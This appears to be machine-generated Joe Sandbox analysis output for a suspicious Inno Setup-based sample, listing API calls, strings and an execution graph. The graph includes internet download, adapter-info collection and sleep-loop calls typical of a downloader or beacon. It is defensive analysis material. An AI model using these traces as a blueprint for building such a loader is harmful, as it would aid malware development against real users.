                                                                  • API String ID: 2406187244-2685451598
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 00413D3E
                                                                  • GetDesktopWindow.USER32 ref: 00413DF6
                                                                    • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                                    • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                                  Similarity
                                                                  • API ID: CursorDesktopWindow$Show
                                                                  • String ID:
                                                                  • API String ID: 2074268717-0
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                                  Similarity
                                                                  • API ID: LoadString$FileMessageModuleName
                                                                  • String ID:
                                                                  • API String ID: 704749118-0
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                                    • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                                    • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                                  • IsRectEmpty.USER32(?), ref: 0044E94B
                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                                  Similarity
                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                  • String ID:
                                                                  • API String ID: 855768636-0
                                                                  APIs
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                                  Similarity
                                                                  • API ID: OffsetRect
                                                                  • String ID:
                                                                  • API String ID: 177026234-0
                                                                  APIs
                                                                  • GetCursorPos.USER32 ref: 00417258
                                                                  • SetCursor.USER32(00000000), ref: 0041729B
                                                                  • GetLastActivePopup.USER32(?), ref: 004172C5
                                                                  • GetForegroundWindow.USER32(?), ref: 004172CC
                                                                  Similarity
                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                  • String ID:
                                                                  • API String ID: 1959210111-0
                                                                  APIs
                                                                  • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                                  • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                                  • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                                  • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                                  • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                                  • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                                  Similarity
                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                  • String ID:
                                                                  • API String ID: 4025006896-0
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                                  Strings
                                                                  • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                                  • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                                  • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                                  Strings
                                                                  • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                                  • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                                  • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ErrorLast$CountSleepTick
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                                  APIs
                                                                  • GetLastActivePopup.USER32(?), ref: 00424244
                                                                  • IsWindowVisible.USER32(?), ref: 00424255
                                                                  • IsWindowEnabled.USER32(?), ref: 0042425F
                                                                  • SetForegroundWindow.USER32(?), ref: 00424269
                                                                  APIs
                                                                  • GlobalHandle.KERNEL32 ref: 0040626F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                  APIs
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                                  Strings
                                                                  • Failed to parse "reg" constant, xrefs: 00479E44
                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                                  • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                                  Strings
                                                                  • Will not restart Windows automatically., xrefs: 00482CB2
                                                                  Strings
                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                                  • %s\%s_is1, xrefs: 004789A4
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ExecuteMessageSendShell
                                                                  • String ID: open
                                                                  • API String ID: 812272486-2758837156
                                                                  APIs
                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                                  • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: DirectoryErrorExecuteLastShellSystem
                                                                  • String ID: <
                                                                  • API String ID: 893404051-4251816714
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02277B58,00001370,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                  • String ID: )
                                                                  • API String ID: 2227675388-1084416617
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID: /INITPROCWND=$%x $@
                                                                  • API String ID: 2353593579-4169826103
                                                                  APIs
                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                  • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                  • API String ID: 3952431833-1023667238
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                                  • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                                    • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                  • String ID: <cI
                                                                  • API String ID: 3798668922-2480932022
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Value$EnumQuery
                                                                  • String ID: Inno Setup: No Icons
                                                                  • API String ID: 1576479698-2016326496
                                                                  APIs
                                                                    • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(6FBF0000,00480FF3), ref: 0047C8C6
                                                                    • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                                    • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                                  • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                                  Strings
                                                                  • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                                  Similarity
                                                                  • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                  • String ID: Detected restart. Removing temporary directory.
                                                                  • API String ID: 1717587489-3199836293
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                  • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CommandHandleLineModule
                                                                  • String ID: h6W
                                                                  • API String ID: 2123368496-3314947752
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0

                                                                  Execution Graph

                                                                  Execution Coverage:2.7%
                                                                  Dynamic/Decrypted Code Coverage:83.4%
                                                                  Signature Coverage:13.9%
                                                                  Total number of Nodes:1034
                                                                  Total number of Limit Nodes:35
GetFileType 60838->60842 60839->60836 60841 2e5b3bd 60839->60841 60839->60842 60840 2e5b3f1 GetFileType 60840->60841 60841->60840 60841->60842 60926 2e5920c InitializeCriticalSectionAndSpinCount 60841->60926 60842->60834 60842->60837 60842->60838 60927 2e5920c InitializeCriticalSectionAndSpinCount 60842->60927 60846 2e5b5e4 GetModuleFileNameA 60845->60846 60847 2e5b5df 60845->60847 60848 2e5b611 60846->60848 60937 2e5528a 71 API calls __setmbcp 60847->60937 60931 2e5b684 60848->60931 60851 2e53c00 60851->60786 60856 2e5b800 60851->60856 60854 2e5b64a 60854->60851 60855 2e5b684 _parse_cmdline 59 API calls 60854->60855 60855->60851 60857 2e5b809 60856->60857 60860 2e5b80e _strlen 60856->60860 60941 2e5528a 71 API calls __setmbcp 60857->60941 60859 2e53c09 60859->60786 60872 2e5846b 60859->60872 60860->60859 60861 2e58a6d __calloc_crt 59 API calls 60860->60861 60866 2e5b844 _strlen 60861->60866 60862 2e52f74 _free 59 API calls 60862->60859 60863 2e5b896 60863->60862 60864 2e58a6d __calloc_crt 59 API calls 60864->60866 60865 2e5b8bd 60868 2e52f74 _free 59 API calls 60865->60868 60866->60859 60866->60863 60866->60864 60866->60865 60869 2e5b8d4 60866->60869 60942 2e56cbc 59 API calls 2 library calls 60866->60942 60868->60859 60943 2e54f05 8 API calls 2 library calls 60869->60943 60871 2e5b8e0 60874 2e58477 __IsNonwritableInCurrentImage 60872->60874 60944 2e5d2df 60874->60944 60875 2e58495 __initterm_e 60877 2e584b4 __cinit __IsNonwritableInCurrentImage 60875->60877 60947 2e533a4 60875->60947 60877->60786 60878->60762 60879->60782 60880->60754 60881->60761 60882->60767 60883->60773 60884->60762 60886 2e591e2 TlsGetValue 60885->60886 60887 2e591de 60885->60887 60886->60757 60887->60757 60889 2e58a74 60888->60889 60891 2e53cb5 60889->60891 60893 2e58a92 60889->60893 60982 2e604b8 60889->60982 60891->60762 60894 2e591ea TlsSetValue 60891->60894 60893->60889 60893->60891 60990 2e59505 Sleep 60893->60990 60894->60772 60896 2e55ced __fcloseall 60895->60896 60897 2e588ee __lock 
59 API calls 60896->60897 60898 2e55d2a 60897->60898 60993 2e55d82 60898->60993 60901 2e588ee __lock 59 API calls 60902 2e55d4b ___addlocaleref 60901->60902 60996 2e55d8b 60902->60996 60904 2e55d76 __fcloseall 60904->60781 60906 2e52f7d HeapFree 60905->60906 60910 2e52fa6 _free 60905->60910 60907 2e52f92 60906->60907 60906->60910 61001 2e55e5b 59 API calls __getptd_noexit 60907->61001 60909 2e52f98 GetLastError 60909->60910 60910->60762 60911->60762 60912->60794 60913->60796 60914->60800 60915->60801 60916->60808 60917->60809 60918->60820 60920 2e58912 RtlEnterCriticalSection 60919->60920 60921 2e588ff 60919->60921 60920->60829 60929 2e58976 59 API calls 10 library calls 60921->60929 60923 2e58905 60923->60920 60930 2e58440 59 API calls 3 library calls 60923->60930 60926->60841 60927->60842 60928->60833 60929->60923 60933 2e5b6a6 60931->60933 60935 2e5b70a 60933->60935 60939 2e615d6 59 API calls x_ismbbtype_l 60933->60939 60934 2e5b627 60934->60851 60938 2e58ab5 59 API calls 2 library calls 60934->60938 60935->60934 60940 2e615d6 59 API calls x_ismbbtype_l 60935->60940 60937->60846 60938->60854 60939->60933 60940->60935 60941->60860 60942->60866 60943->60871 60945 2e5d2e2 RtlEncodePointer 60944->60945 60945->60945 60946 2e5d2fc 60945->60946 60946->60875 60950 2e532a8 60947->60950 60949 2e533af 60949->60877 60951 2e532b4 __fcloseall 60950->60951 60958 2e58593 60951->60958 60957 2e532db __fcloseall 60957->60949 60959 2e588ee __lock 59 API calls 60958->60959 60960 2e532bd 60959->60960 60961 2e532ec RtlDecodePointer RtlDecodePointer 60960->60961 60962 2e53319 60961->60962 60963 2e532c9 60961->60963 60962->60963 60975 2e5915d 60 API calls 2 library calls 60962->60975 60972 2e532e6 60963->60972 60965 2e5337c RtlEncodePointer RtlEncodePointer 60965->60963 60966 2e53350 60966->60963 60970 2e5336a RtlEncodePointer 60966->60970 60977 2e58afc 62 API calls 2 library calls 60966->60977 60967 2e5332b 60967->60965 60967->60966 60976 2e58afc 62 API calls 2 library calls 
60967->60976 60970->60965 60971 2e53364 60971->60963 60971->60970 60978 2e5859c 60972->60978 60975->60967 60976->60966 60977->60971 60981 2e58a58 RtlLeaveCriticalSection 60978->60981 60980 2e532eb 60980->60957 60981->60980 60983 2e604c3 60982->60983 60988 2e604de 60982->60988 60984 2e604cf 60983->60984 60983->60988 60991 2e55e5b 59 API calls __getptd_noexit 60984->60991 60986 2e604ee RtlAllocateHeap 60987 2e604d4 60986->60987 60986->60988 60987->60889 60988->60986 60988->60987 60992 2e58204 RtlDecodePointer 60988->60992 60990->60893 60991->60987 60992->60988 60999 2e58a58 RtlLeaveCriticalSection 60993->60999 60995 2e55d44 60995->60901 61000 2e58a58 RtlLeaveCriticalSection 60996->61000 60998 2e55d92 60998->60904 60999->60995 61000->60998 61001->60909 61002 40dc42 61003 40dc46 61002->61003 61004 40dcaf 61002->61004 61003->61004 61005 40dc5d RegOpenKeyExA 61003->61005 61006 40dc70 61005->61006 61007 40d402 VirtualAlloc 61008 40d6a1 61007->61008 61009 2e4f9a6 LoadLibraryA 61010 2e4f9cf GetProcAddress 61009->61010 61011 2e4fa89 61009->61011 61012 2e4fa82 FreeLibrary 61010->61012 61015 2e4f9e3 61010->61015 61012->61011 61013 2e4f9f5 GetAdaptersInfo 61013->61015 61014 2e4fa7d 61014->61012 61015->61013 61015->61014 61017 2e53b4c 61015->61017 61019 2e53b54 61017->61019 61020 2e53b6e 61019->61020 61022 2e53b72 std::exception::exception 61019->61022 61025 2e52fac 61019->61025 61042 2e58204 RtlDecodePointer 61019->61042 61020->61015 61043 2e5455a RaiseException 61022->61043 61024 2e53b9c 61026 2e53027 61025->61026 61035 2e52fb8 61025->61035 61050 2e58204 RtlDecodePointer 61026->61050 61028 2e5302d 61051 2e55e5b 59 API calls __getptd_noexit 61028->61051 61031 2e52feb RtlAllocateHeap 61032 2e5301f 61031->61032 61031->61035 61032->61019 61034 2e52fc3 61034->61035 61044 2e586d4 59 API calls 2 library calls 61034->61044 61045 2e58731 59 API calls 8 library calls 61034->61045 61046 2e5831d GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61034->61046 61035->61031 
61035->61034 61036 2e53013 61035->61036 61040 2e53011 61035->61040 61047 2e58204 RtlDecodePointer 61035->61047 61048 2e55e5b 59 API calls __getptd_noexit 61036->61048 61049 2e55e5b 59 API calls __getptd_noexit 61040->61049 61042->61019 61043->61024 61044->61034 61045->61034 61047->61035 61048->61040 61049->61032 61050->61028 61051->61032 61052 40dbc2 lstrcmpiW 61053 2e7e084 61054 2e7e0a9 61053->61054 61057 2e4f8a2 CreateFileA 61054->61057 61058 2e4f99e 61057->61058 61062 2e4f8d3 61057->61062 61059 2e4f8eb DeviceIoControl 61059->61062 61060 2e4f994 CloseHandle 61060->61058 61061 2e4f960 GetLastError 61061->61060 61061->61062 61062->61059 61062->61060 61062->61061 61063 2e53b4c _Allocate 60 API calls 61062->61063 61063->61062 61064 2e7e224 CreateFileA 61065 2e9af16 61064->61065 61066 402247 CopyFileA 61067 402840 61066->61067 61068 402947 61069 40295b RegCloseKey 61068->61069 61071 40d6d7 61069->61071 61071->61071 61072 2e4104d 61073 2e533a4 __cinit 68 API calls 61072->61073 61074 2e41057 61073->61074 61077 2e41aa9 InterlockedIncrement 61074->61077 61078 2e41ac5 WSAStartup InterlockedExchange 61077->61078 61079 2e4105c 61077->61079 61078->61079 61080 402cce 61083 402cd1 61080->61083 61081 40d168 RegCloseKey 61081->61083 61082 40dca1 61082->61082 61083->61081 61083->61082 61084 2e472ab InternetOpenA 61085 2e472c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 61084->61085 61093 2e47389 __cftoa_l 61084->61093 61188 2e54af0 61085->61188 61088 2e47382 InternetCloseHandle 61088->61093 61089 2e47342 InternetReadFile 61095 2e47377 InternetCloseHandle 61089->61095 61090 2e46708 Sleep 61092 2e4670e RtlEnterCriticalSection RtlLeaveCriticalSection 61090->61092 61091 2e466f4 61091->61090 61091->61092 61101 2e46744 __cftoa_l 61092->61101 61093->61091 61096 2e473e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61093->61096 61095->61088 61190 2e5233c 61096->61190 61098 2e47413 61099 2e47463 61098->61099 61102 2e5233c 66 API calls 61098->61102 61099->61091 61100 2e5233c 
66 API calls 61099->61100 61103 2e47484 61100->61103 61104 2e47427 61102->61104 61109 2e52fac _malloc 59 API calls 61103->61109 61159 2e47738 61103->61159 61104->61099 61105 2e5233c 66 API calls 61104->61105 61107 2e4743b 61105->61107 61106 2e5233c 66 API calls 61108 2e47750 61106->61108 61107->61099 61113 2e5233c 66 API calls 61107->61113 61110 2e4779d 61108->61110 61112 2e4775a __cftoa_l 61108->61112 61111 2e4749d RtlEnterCriticalSection RtlLeaveCriticalSection 61109->61111 61114 2e5233c 66 API calls 61110->61114 61139 2e474d5 __cftoa_l 61111->61139 61117 2e4776a RtlEnterCriticalSection RtlLeaveCriticalSection 61112->61117 61115 2e4744f 61113->61115 61116 2e477ab 61114->61116 61115->61099 61120 2e5233c 66 API calls 61115->61120 61118 2e477d0 61116->61118 61119 2e477b1 61116->61119 61117->61091 61122 2e5233c 66 API calls 61118->61122 61243 2e461f5 61119->61243 61120->61099 61123 2e477de 61122->61123 61124 2e47b00 61123->61124 61127 2e477f0 61123->61127 61125 2e5233c 66 API calls 61124->61125 61126 2e47b0e 61125->61126 61126->61091 61128 2e52fac _malloc 59 API calls 61126->61128 61127->61091 61246 2e52418 61127->61246 61132 2e47b22 __cftoa_l 61128->61132 61136 2e47b4f 61132->61136 61316 2e4534d 93 API calls 2 library calls 61132->61316 61133 2e478aa 61134 2e478e2 RtlEnterCriticalSection 61133->61134 61137 2e47905 61134->61137 61138 2e4790f RtlLeaveCriticalSection 61134->61138 61135 2e4755c 61142 2e52fac _malloc 59 API calls 61135->61142 61143 2e52f74 _free 59 API calls 61136->61143 61137->61138 61264 2e43c67 61138->61264 61139->61135 61140 2e5233c 66 API calls 61139->61140 61140->61135 61150 2e47593 __cftoa_l 61142->61150 61143->61091 61152 2e475f8 61150->61152 61309 2e535e6 60 API calls 3 library calls 61150->61309 61151 2e47ae7 61315 2e49002 88 API calls __EH_prolog 61151->61315 61155 2e52f74 _free 59 API calls 61152->61155 61157 2e475fe 61155->61157 61157->61159 61161 2e53b4c _Allocate 60 API calls 61157->61161 61158 2e47aaf 61294 2e483e9 61158->61294 
61159->61106 61165 2e4760e 61161->61165 61169 2e47629 61165->61169 61312 2e49736 212 API calls __EH_prolog 61165->61312 61166 2e475c4 61166->61152 61310 2e52850 59 API calls _vscan_fn 61166->61310 61311 2e535e6 60 API calls 3 library calls 61166->61311 61168 2e4a724 73 API calls 61174 2e47a1a 61168->61174 61200 2e4a84e 61169->61200 61173 2e4763f 61204 2e45119 61173->61204 61174->61158 61175 2e4a724 73 API calls 61174->61175 61176 2e47a6b 61175->61176 61176->61158 61289 2e4d116 61176->61289 61179 2e47687 61233 2e4ac0e 61179->61233 61182 2e476e7 shared_ptr 61183 2e476ec Sleep 61182->61183 61313 2e518f0 GetProcessHeap HeapFree 61183->61313 61185 2e47708 61186 2e47722 shared_ptr 61185->61186 61314 2e44100 GetProcessHeap HeapFree 61185->61314 61186->61159 61189 2e47322 InternetOpenUrlA 61188->61189 61189->61088 61189->61089 61191 2e5236b 61190->61191 61192 2e52348 61190->61192 61319 2e52383 66 API calls 5 library calls 61191->61319 61192->61191 61194 2e5234e 61192->61194 61317 2e55e5b 59 API calls __getptd_noexit 61194->61317 61195 2e5237e 61195->61098 61197 2e52353 61318 2e54ef5 9 API calls __fclose_nolock 61197->61318 61199 2e5235e 61199->61098 61201 2e4a858 __EH_prolog 61200->61201 61320 2e4dfff 61201->61320 61203 2e4a876 shared_ptr 61203->61173 61205 2e45123 __EH_prolog 61204->61205 61324 2e50b10 61205->61324 61208 2e43c67 72 API calls 61209 2e4514a 61208->61209 61210 2e43d7e 64 API calls 61209->61210 61211 2e45158 61210->61211 61212 2e4833a 89 API calls 61211->61212 61213 2e4516c 61212->61213 61214 2e45322 shared_ptr 61213->61214 61215 2e4a724 73 API calls 61213->61215 61214->61179 61216 2e4519d 61215->61216 61216->61214 61217 2e451c4 61216->61217 61218 2e451f6 61216->61218 61219 2e4a724 73 API calls 61217->61219 61220 2e4a724 73 API calls 61218->61220 61221 2e451d4 61219->61221 61222 2e45207 61220->61222 61221->61214 61224 2e4a724 73 API calls 61221->61224 61222->61214 61223 2e4a724 73 API calls 61222->61223 61225 2e4524a 61223->61225 61226 2e452b4 61224->61226 
61225->61214 61227 2e4a724 73 API calls 61225->61227 61226->61214 61228 2e4a724 73 API calls 61226->61228 61227->61221 61229 2e452da 61228->61229 61229->61214 61230 2e4a724 73 API calls 61229->61230 61231 2e45304 61230->61231 61328 2e4ced8 61231->61328 61234 2e4ac18 __EH_prolog 61233->61234 61352 2e4d0ed 72 API calls 61234->61352 61236 2e4ac39 shared_ptr 61353 2e520f0 61236->61353 61238 2e4ac50 61239 2e476d4 61238->61239 61359 2e43fb0 68 API calls Mailbox 61238->61359 61239->61182 61239->61183 61241 2e4ac5c 61360 2e4a68a 60 API calls 4 library calls 61241->61360 61244 2e52fac _malloc 59 API calls 61243->61244 61245 2e46208 61244->61245 61247 2e52434 61246->61247 61248 2e52449 61246->61248 61595 2e55e5b 59 API calls __getptd_noexit 61247->61595 61248->61247 61252 2e52450 61248->61252 61250 2e52439 61596 2e54ef5 9 API calls __fclose_nolock 61250->61596 61253 2e47827 61252->61253 61597 2e55f01 79 API calls 6 library calls 61252->61597 61255 2e41ba7 61253->61255 61598 2e653f0 61255->61598 61257 2e41bb1 RtlEnterCriticalSection 61258 2e41be9 RtlLeaveCriticalSection 61257->61258 61259 2e41bd1 61257->61259 61599 2e4e32f 61258->61599 61259->61258 61261 2e41c55 RtlLeaveCriticalSection 61259->61261 61261->61133 61262 2e41c22 61262->61261 61265 2e50b10 Mailbox 68 API calls 61264->61265 61266 2e43c7e 61265->61266 61662 2e43ca2 61266->61662 61271 2e43d7e 61272 2e43d99 htons 61271->61272 61273 2e43dcb htons 61271->61273 61691 2e43bd3 60 API calls 2 library calls 61272->61691 61692 2e43c16 60 API calls 2 library calls 61273->61692 61276 2e43db7 htonl htonl 61277 2e43ded 61276->61277 61278 2e4833a 61277->61278 61279 2e48352 61278->61279 61280 2e48373 61278->61280 61693 2e495fc 61279->61693 61283 2e4796c 61280->61283 61696 2e42ac7 61280->61696 61283->61151 61284 2e4a724 61283->61284 61285 2e50b10 Mailbox 68 API calls 61284->61285 61286 2e4a73e 61285->61286 61287 2e479b8 61286->61287 61767 2e42db5 61286->61767 61287->61158 61287->61168 61290 2e50b10 Mailbox 68 